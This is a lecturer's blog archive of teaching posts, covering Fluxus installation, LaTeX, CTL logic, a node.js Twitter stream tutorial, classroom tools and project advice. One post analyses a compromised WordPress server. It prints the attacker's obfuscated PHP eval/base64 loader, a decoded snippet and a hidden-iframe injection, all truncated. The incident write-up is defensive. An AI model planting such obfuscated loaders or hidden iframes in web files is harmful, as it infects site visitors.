Category Archives: teaching

Installing Fluxus on Mac OS X 10.6-10.8

Fluxus is a “a live coding environment for 3D graphics, music and game” available at http://www.pawfal.org/fluxus/. If you know Racket (or LISP, or Scheme) it will look immediately familiar. I wanted to install it for our new Computer Science degree, where we teach Racket, and I wanted to do some experiments with its music capabilties. However, the installation is not exactly user-friendly… I have tried the precompiled package available from the website but sound did not work for me (flexa was missing). In the end, I installed the source files and compiled them, and I managed to have the sound.

This is what I have done on a Mac OS X 10.6 (a 6 year-old Mac Pro) and Mac OS X 10.8 (a 3-week old Mac Book Pro). It is essentially what the README file in the source tree tells you to do; the problem is that you find a lot of websites giving you different suggestions, including the README file itself. For instance, the README file tells you that you can use Homebrew to install fluxus, but the homebrew installation is broken for the moment… So, here it goes:

Install the 32 bit version of Racket, dowloadable from http://racket-lang.org/download/. I have installed 5.3.6. Notice that you really need the 32 version: fluxus will not link against the 64-bit version.
Install Macports from https://www.macports.org/install.php. This is needed to install all the fluxus dependencies below.
Clone the fluxus source code: git clone git://git.savannah.nongnu.org/fluxus.git
Add the following two lines to your .bash_profile:
```
PATH=$PATH:/opt/local/bin:/Applications/Racket\ v5.3.6/bin/
export DYLD_FRAMEWORK_PATH=/Applications/Racket\ v5.3.6/lib/
```
Make sure that the Racket version is correct, and change it appropriately if needed.The file .bash_profile shoud be in your home directory, typically something like /Users/franco/. If it does not exist, just create it and make sure to open a new terminal so that these variables are loaded. You can check this with the command echo $PATH from the command line.
Install all the dependencies using macport. From the command line, run:
```
sudo port install fftw-3 +universal glew +universal freetype \
  +universal jpeg +universal liblo +universal libpng +universal \
  libsndfile +universal ode +universal tiff +universal zlib \ 
  +universal scons
```
(all this should be on a single line. If not, remember to add the backslash at the end). This will take a bit of time, don’t worry and have a coffee or tea in the meanwhile.
Install JackOSX from http://www.jackosx.com/. I have installed version 0.90 beta 15. This requires to reboot your computer, do this now and have another coffee or tea in the meanwhile.
Go back to the directory where you have downloaded fluxus. In this directory, type:
```
scons ADDONS=0
```
to compile fluxus. Again, you will need to wait a bit (but not too much, not enough for another coffee or tea). Scons is yet another building system that was installed using macports a few lines above.
Finally, you can install fluxus with:
```
sudo scons ADDONS=0 install
```

You are now ready to test the sytem. You need to start Jack and fluxa, and then you’ll be able to play some music. More in detail:

In Applications, look for the folder called Jack, open it and double click on JackPilot. Check that the configuration is correct, save it, and then start JackPilot. Wait a few seconds and it should be ready, giving you CPU load.
In a terminal, launch the command fluxa (it should be in your path). It should just say “fluxa server ready”
Finally, let’s try to play something. In a terminal, go to the source tree of Fluxus, enter the “examples” directory, and at the command line type fluxus sound.scm. Press ctrl+e (or F5) and enjoy…

New academic year: welcome!

Leave a reply

It is Sunday evening, and for a lot of students tomorrow will be the first day at Middlesex University. Formal lectures will only start on the 7th of October, but from tomorrow “induction week” is on and students will get their access cards and will go through a lot of activities, meeting staff members and other students.

This year I teach “Information Security Management” for MSc students in Electronic Security and Digital Forensics. I will talk about this in another post at some point in the future.

More importantly, tomorrow will be the first day for our new undergraduate Computer Science programme. This is a completely new programme: in their first year, students will use Racket, Arduino boards, Rasperry Pi, and a will do a lot of interesting things, including reading and posting tweets from a robot…

I still remember my first academic year and I can also remember my very first days at university. Given that the first days are so important (see the Baby duck syndrome for an interesting article on imprinting and software), we have decided to make this first week a bit different… We will work with students to learn the basic ingredients of LaTeX, “the de facto standard for the communication and publication of scientific documents”. LaTeX is a simple example of a programming language, and this is a simple example of LaTeX program:

\documentclass{article}
 
\begin{document}
 
\title{Hello World!}
\author{Franco Raimondi}
 
\maketitle
 
\section{Introduction}
Printing Hello World is usually the first thing you learn in a programming language.
 
\section{Another section}
 
You probably know this equation:
\begin{equation}
E=mc^2
\end{equation}
 
This is another very important equation:
\begin{equation}
i \hbar \frac{\partial}{\partial t} \Psi = \hat{H} \Psi
\end{equation}
 
\end{document}

With LaTeX you do not worry about the actual output, but you simply say that “Hello World” (line 5) is a title, that the Author is Franco Raimondi (line 6), that there is a section whose title is Introduction (line 10), and that the content of the section is “Printing Hello World is usually the first thing you learn in a programming language.” (see http://en.wikipedia.org/wiki/Hello_world_program if you want to know more). At line 13 another section begins, containing two equations (the syntax of equations in LaTeX will not be covered, but you can find plenty of documentation on-line).

In the labs, students will compile LaTeX code and generate PDF files using one of the many compilers available such as MiKTeX and TeXnicCenter, learning that the compiler takes care of the actual result.

Click on this link to see the final result for the example above.

Finally, if you have Facebook or Twitter, don’t forget to follow these two pages:

Mushrooms and the universal vs. existential “eventually”.

Leave a reply

Today I gave the last lecture of my course “Logic and Model Checking”. In the past few weeks we have revised Computational Tree Logic (CTL) and I spent a bit of time explaining the difference between the semantics of the CTL operators AF and EF. The first one expresses the universal “eventually”: if you write AF p, this means that “for All paths”, “at some point in the Future”, the proposition p will be true. EF p, instead, means that “there Exists a path” such that “at some point in the Future”, the proposition p will be true.

The standard example I use the explain the difference is to set p equal to the proposition “find a mushroom”. So, “AF p” means: it doesn’t matter which path you take, just be patient and you will eventually find a mushroom. “EF p”, instead, means: there exists a path such that, if you follow that path, you will eventually find a mushroom. I then go on explaining that my only way of finding an edible mushroom is to be in a wood where AF p is true, because in “EF p” woods I will never find a mushroom (I am really unlucky at mushroom hunting).

I guess the students liked the analogy, this is what I got today at the end of the class:

It is now my turn to revise an old recipe I used to prepare: Portobello mushrooms with goat cheese.

Who is talking about pizza in London?

Leave a reply

Some of my students are interested in using Twitter data for their projects, and some others are interested in developing network applications. In this post I show how to retrieve data from the Twitter stream and how to manipulate it with server-side Javascript using node.js. In particular: I will build a stream of all the geo-tagged tweets from London talking about pizza.

DISCLAIMER: I am not an advocate of node.js. The same thing could be done in Python, Ruby, you-name-it. I am using node.js because 1) my students are familiar with Java and 2) the code is very short.

OK let’s start from a quick introduction to the Twitter stream API: there is a sample stream available from https://stream.twitter.com/1/statuses/sample.json. This stream will return a random sample of tweets (notice: this is a lot of data!). You can connect to this stream in a number of ways, the easiest is from the command line using curl (this works on Mac and Linux, I don’t know in Windows. You obiously need to have a Twitter account for this):

$ curl --user YOURUSERNAME:YOURPASSWORD https://stream.twitter.com/1.1/statuses/sample.json

This will display a long list of tweets in JSON format. You can even point your browser to this address and see what happens. From the command line you could redirect the output to a file to be processed at a later stage, but it is probably a better idea to retrieve only the tweets that are relevant to you.

In my case, I am interested in tweets originating from London and containing certain keywords. Twitter provides an end-point for this, see https://dev.twitter.com/docs/api/1.1/post/statuses/filter. In particular, one can retrieve all the tweets containing specific keywords, or originating from a certain location (assuming the user provides this information). Again, there are a number of ways to connect to this end-point. If you want to use Python, there is a very simple class called tweetstream that can help you with this; otherwise, you can still use curl passing the parameters in the appropriate way:

curl --user YOURUSERNAME:YOURPASSWORD -d "track=pizza" https://stream.twitter.com/1.1/statuses/filter.json

Irrespective of the technology you use to connect, there are two key things to keep in mind:

The filtered stream is not a sample, it’s the full set of tweets satisfying your query (subject to certain limits).
If you provide more than one condition (e.g. a location and a list of keywords), the API will return all the tweets satisying any of the two. If you want the tweets that satisfy both conditions (e.g., all the tweets talking about pizza in London) you need to retrieve all the tweets from London, and then filter them locally. This is what I am going to do below.

Let’s now move to retrieving the tweets and displaying them in real time. Download node.js for your platform from this link: http://nodejs.org/download/ (I am using the binary version 0.10.1)

Extract the archive and try to write a simple http server. This is taken from http://nodejs.org/ and is a simple http reserve running on port 8080 and returning the string Hello World! to all requests:

var http = require('http');
http.createServer(function (req, res) {
  res.writeHead(200, {'Content-Type': 'text/plain'});
  res.end('Hello World\n');
}).listen(8080, 'YOUR IP ADDRESS HERE');
console.log('Server running at http://YOUR IP ADDRESS HERE:8080/');

(obviously: put your IP address in the right place and make sure you don’t have firewalls blocking port 8080 etc). Save this code in a file, for instance test.js, and then run it with:

$ /path/to/node/bin/node test.js

Point your browser to the IP address on port 8080 and you should see Hello World!

The next step is to connect to the Twitter streaming API using node.js. To this end, I use this client: https://github.com/ttezel/twit. Just get it and install it (follow the on-line instructions, it should be very easy).

Before connecting to the Twitter API, go to https://dev.twitter.com/apps/new and create an application. You need to get a consumer_key, a consumer_secret, an access_token, and an access_token_secret. At this point you can connect to the Twitter streaming filter with the following code:

var Twit = require('twit')
var T = new Twit({
    consumer_key:         '...'
  , consumer_secret:      '...'
  , access_token:         '...'
  , access_token_secret:  '...'
})
var london =  [ '-0.489','51.28','0.236','51.686']
var stream = T.stream('statuses/filter', { locations: london })
stream.on('tweet', function (tweet) {
  console.log(tweet)
})

Fill in your keys, save the file and try to run it: you should see a stream of tweets from London (the bounding box is derived from openstreetmap).

I now put the two things together: I will stream the tweets using an http server. The code is the following:

var Twit = require('twit')
var http = require('http')
var url = require("url")
 
var T = new Twit({
    consumer_key:         '...'
  , consumer_secret:      '...'
  , access_token:         '...'
  , access_token_secret:  '...'
})
 
var london = [ '-0.489','51.28','0.236','51.686']
var stream = T.stream('statuses/filter', { locations: london })
 
var server = http.createServer(function (req, res) {
  var uri = url.parse(req.url).pathname;
  if(uri === "/pizzastream") {
    console.log("Request received");
    stream.on('tweet', function(tweet) {
      if(tweet.text.toLowerCase().indexOf("pizza") &gt; -1) {
        res.write(tweet.user.name+" says: "+tweet.text);
      }
    });
  }
});
server.listen(8080);

The code is as follows: line 13 creates a variable called stream that includes the stream originating from the Twitter API. Line 15 creates a variable called http for the http server. In line 16 and 17 we check whether the requested URL is /pizzastream. If this is the case, every time there is new data on the Twitter stream (line 19), if the text of the tweet contains the word “pizza” (line 20), I write the name of the user and the text of the tweet to the http stream (line 21). Notice how the value of the various fields is accessed using tweet.text and tweet.user.name (other fields are available, check the full JSON output). You can check the actual output by pointing your browser to the address of the machine running this code, for instance http://192.168.0.10:8080/pizzastream.

The code should be improved to include an “else” statement for the if condition in line 17. Also, the stream should be kept “alive” when there is no data: have a look at the documentation available at this link: http://nodejs.org/api/stream.html

The nomadic board

3 Replies

(a long post on my panoply of teaching tools.)

When I started teaching in the UK more than 10 years ago, I was a teaching assistant at King’s College for Foundations of Computing and for a number of other courses. I was using chalk on a blackboard (to be precise: a green board), and in some rooms I was using an OHP with slides and a marker. Students didn’t have laptops and phones didn’t have internet.

A number of things have changed: here are Middlesex there are no blackboards, there are a few OHP left (a lot of times without slides), students have smartphones and in some cases I have to teach in rooms without (white) boards. The only certainty I have is that in every room there is a projector, a networked PC and video input for a laptop; the other certainty is that students are very likely to be connected using a phone or a tablet or a laptop (quite often a combination of these).

For sure, it is not possible for me to use the same teaching tools I used at King’s. There are two things that I can do:

start moaning

adapt

I am not going to express an opinion on which situation is better but, after a while, moaning is boring even for the moaner: I decided to adapt.

My first consideration is that there is no way for me to ban smartphones and other internet-connected gadgets from the room. Therefore, I decided that it could be a good idea to employ them, and this is what Lalith and I did a few months ago: http://q.mdx.ac.uk/about.php

The mechanism is simple: I can prepare questions in advance and advertise them to students at the right point in the lecture. Students then need to use their devices to answer the questions. This is an example of what students see on their devices (this is optimized for small devices):

Click here to answer: http://q.mdx.ac.uk/ox51g

And this is what I see as students answer, live in the class:

Results for a question about high order functions in Haskell

(It was quite clear that only half of the class could get the type right, so I spent a bit more time on high order functions during the labs).

The short code that I advertise to students is OK (5 characters in total), but it is probably too long to get it right most of the time. So, my second consideration was: let’s use Twitter to advertise the questions and other messages to students; a number of courses around the world are already doing this, so it is probably not a bad idea… Notice the small Twitter (and Facebook, if you prefer) buttons above in our application: these allow to share the question with a simple click (by me). I have created a Twitter account for my modules (https://twitter.com/cmt4031 and https://twitter.com/bis4610), and this is where I post the questions. In this way, students only have to follow the course, and they will receive the links directly: no need to type, they just need to open their Twitter stream during the lectures.

There was another problem left: the lack of a board. This would be a big change for me, I definitely need a board to make examples, respond to questions and do exercises. As usual, I had an idea while running: use a tablet. I have a Samsung Galaxy Note 10.1: I have this one because I wanted something where I could write using a pen (note: the iPad and other tablets will not work, you really need a tablet with a dedicated pen to have the adequate resolution). I used the tablet to annotate reports and theses, can it be used as a board? YES it can! And it works great: you only need to mirror the tablet on a desktop (or on a laptop) connected to the projector, and you have a board (see “Technical details” below for additional information).

The nomadic syntax of First Order Logic (lecture in room C215, no board, using my Linux laptop with vinagre). The big screen is out of focus, but I guarantee it is readable.

In this way you have more than a board: you have what I decided to call a “nomadic board”. You can walk around the room, sit with the students, move around, sit somewhere else, etc. My current workflow is the following: I do not project the slides, even if these are available online and students can see them if they want (possibly using their devices, possibly during the lecture). Instead, I write the key elements of the slides on the “board” (definitions, etc.), walking around and sitting with students while I do this. If there is a question, or if I ask a question using q.mdx.ac.uk, I explain the answer using the “board”. At the end of the lecture I upload all the notes from the “board” as a PDF file to our VLE so that students have these available (in addition to the standard slides).

There is an additional benefit. In Italy, it was quite common to be “called to the board” to solve exercises. The teacher / lecturer / teaching assistant would pick a random student and ask to solve an exercise. I used to do this, but I stopped a few years ago as it was impractical to switch between slides projected on a screen and the whiteboard. But now I can do this again, just a bit differently: instead of asking the student to walk to the board, I walk the “board” to the student:

Michael (CMT4031 student) hard at work to encode mutual exclusion on the tablet (H104 lab, using the Windows 7 desktop in the room with RealVNC)

Typically, I ask “what is the day today? 28th of January?”, and I look for the 28th student from left or right; I have a number of variations on this (“what is your day of birth”, add the two digits, and so on), so that students cannot choose their seats according to the day.

Overall, this is working quite well and I’m happy with the current situation. Setting up the whole mechanism requires a bit of IT knowledge, so I’m not sure that the technology is ready to be adopted by everyone (see the “Technical details” below). But I guess that, eventually, the integration of tablets with projectors will become more common.

What if projectors are removed? Well, I’ll adapt once more…

Technical details.

Continue reading →

Book review: The Universal Computer

Leave a reply

I saw this title on a tweet by an Italian friend a couple of months ago, and I decided to add it to my queue of books-to-read, thanks to various positive reviews that are available online:

Martin Davis, The Universal Computer: The road from Leibniz to Turing.
Published by W. W. Norton & Co., 2000. 270 pages

I have now finished it and I can say that this is not a good book: this is an extraordinary book about the history of computer science, and it should be compulsory reading in any CS curriculum.

The book provides an overview of a number of key figures in the history of mathematics and computer science: Leibniz, Boole, Frege, Cantor, Hilbert, Godel and Turing, with two final chapters on “hardware” history and directions for the future. What makes the book unique is that the presentation of the various philosophers and mathematicians is as captivating as the best novel you have ever read: it is just not possible to stop reading it. In fact, I am currently late with a couple of reviews that I planned to complete on a Eurostar trip because I had to finish this book.

The presentation is self-contained, no background knowledge is required to understand the various chapters (neither of philosophy nor of mathematics / computer science). The description of the proofs of incompleteness for PA and undecidability for FOL are probably the most accessible I have ever seen (don’t forget to have a look at all the notes at the end of the book: they are as clear and as important as the main body of the book).

It is true that the book does not give an in-depth analysis of the various philosophers. It is true that some figures are missing (e.g., no mention of Tarski in “Beyond Leibniz’s Dream”). It is also true that the approach is a bit Manichean in some points (and in some cases my personal opinions are probably on the “wrong” side). Nevertheless, I think this book is fundamental to understand our position in history, what we do, and why we do it.

Overall, I think this book should be at the top of your reading list, right next to ZAMM.

Choosing a project supervisor

Leave a reply

Dear students,

given that the deadline for choosing a supervisor is coming up soon, a friend of mine has suggested that I post a “serious” set of recommendations for now… So here are the suggestions I have (and that I keep repeating to my students):

First of all, try to think of the following:

What would you like to do? I don’t mean what would you like to do now, I really mean: what would you like to do when you finish your studies? Do you want to be a programmer? Do you want to be an analyst? What is your favourite activity? Think of your future, and use the final year project as a way to reach what you want to do / what you want to be.
You need to do a good job in your final year project: not only it will contribute substantially to your final mark, but you can also use your project in your job applications. It needs to identify a problem and you need to show your solution, and more importantly your path to reach that solution.

At this point, you can start looking for your supervisor. Look for someone with a research interest close to the topic you like, or someone teaching a similar subject. Have a look at the staff pages (start from http://www.cs.mdx.ac.uk). Don’t be shy: send emails and, more importantly, go to lecturers’ office hours! (check the right-hand side for my office hours).

Be prepared to change your topic. In a number of cases your project may be too ambitious for the short time you have, or maybe a solution exists already (in this case you could try to improve the solution)

Don’t try to copy someone else’s structure or topic: remember, you have to do what you like!

Have a look at the material that is available online (myunihub). In particular, have a look at how you will be assessed: it is important to develop a product or to obtain results, but it is equally important to do a literature review, requirements anakysis, and design. An excellent piece of software without documentation is not enough, remember that you need to show your path.

Information Security Management: a short introduction to password security

Leave a reply

This is a set of slides I have prepared for the students of BIS4610 (Information Security Management), comments are welcome:
A short introduction to password security

XSS exploit and WordPress

Leave a reply

A couple of people sent me an email yesterday saying that one of the web sites I manage was a bit slow and in some cases it was crashing their browsers. As soon as I had a bit of time to check the website it was immediately clear that it wasn’t a configuration problem or CSS bug: the main page was trying to include strange links. I had a quick look at the source code of the page returned by the web server (using curl):

1
2
3

<script type="text/javascript">
// A lot of stuff here
  document.write("<iframe src='SOME LINK HERE' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");

I sat down with another sysadmin and we immediately found out that there was a problem with some of the php pages of this site and of other web sites on the same server. All the affected php pages had the first line containing the following php code:

<?php    eval(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX [...]'))); ?>

After decoding, this code does the following:

<?php 
   // [...]
   $dbf=$dr.'/'.md5(date('m.d.y'));
   $odbf = $dr.'/'.md5(date('m.d.y'),time()-86400);
   if (file_exists($odbf))
     @unlink($odbf);
   if(strpos(@file_get_contents($dbf),$ip) === false){
      if( !preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT'])) {
        print "<script-->try{window.document.body= [...]; n=["9","9","45","42","17" [...] "
     }
   }
}
?>

The line

  print "<script-->try{window.document.body= [...]; n=["9","9","45","42","17" [...] ";

contains yet another encoded string (the variable n) that is passed to the browser, and then interpreted by the client to generate HTML code similar to the following:

1 2	// A lot of stuff here document.write("<iframe src='SOME LINK HERE' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");

And this is a standard frame injection. We did a bit of analysis and we found that:

php.ini was configured to allow fopen of URL
Various folders were writable by the web server
All the infected files were owned / writable by the user running the web server

In essence: a cross-site scripting exploit that took advantage of writable folders in a shared environment. Thus, for your next installation of WordPress, have a look at Hardening WordPress, and in particular at the File Permissions section.

http://eqna.tk: a simple application to create multiple-choice tests

Leave a reply

The idea is to exploit the fact that nearly all students now have a smartphone, and some of them keep using it even during lectures. This year I decided not to ask students to switch off their mobiles; instead, I’ll ask them to use it to interact with me.

The motivation is that sometimes it may be difficult to grasp the sentiment of a class, especially if there are more than 20 students. With this tool (developed by Lalith Kaushik and I) I can prepare questions in advance, or even during the lecture as the process only takes a few seconds.

Students can answer multiple-choice questions from their mobile phone using a short code (that can also be shared using facebook and twitter. BIS4610 students: please follow https://twitter.com/bis4610). The answer page is designed specifically to be accessed from a mobile device (and indeed it looks a bit strange on a standard PC)

The tool can be used to assess students’ comprehension of a topic (e.g. by asking “what is the square root of 16?”), but it can also be used to obtain feedback about delivery (“The pace of the lecture is: too slow / too fast / about right), and suggestions for future sessions (“What would you like to do next week? Revision / Mock exam / Practical session), etc.